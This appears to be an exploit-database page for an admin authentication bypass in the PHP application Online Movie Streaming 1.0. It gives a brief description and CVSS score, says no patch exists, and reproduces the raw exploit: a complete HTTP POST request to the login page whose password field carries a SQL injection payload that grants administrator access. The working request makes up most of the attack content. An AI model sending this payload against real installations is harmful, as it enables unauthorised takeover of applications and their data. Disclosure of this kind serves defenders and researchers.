header-logo
Suggest Exploit
vendor:
Online Movie Streaming
by:
Richard Jones
7.5
CVSS
HIGH
Admin Authentication Bypass
287
CWE
Product Name: Online Movie Streaming
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
2021

Online Movie Streaming 1.0 – Admin Authentication Bypass

The exploit allows an attacker to bypass the authentication mechanism in the Online Movie Streaming 1.0 application. By manipulating the login form parameters, an attacker can gain administrative access to the application.

Mitigation:

The vendor should implement proper input validation and secure authentication mechanisms to prevent this vulnerability. Users should update to a patched version of the software.
Source

Exploit-DB raw data:

# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit URL: http://TARGET/onlinemovies/Plogin.php
 POST /onlinemovies/Plogin.php HTTP/1.1
 Host: TARGET
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 48
 Origin: http://TARGET
 Connection: close
 Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
 Upgrade-Insecure-Requests: 1

 mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=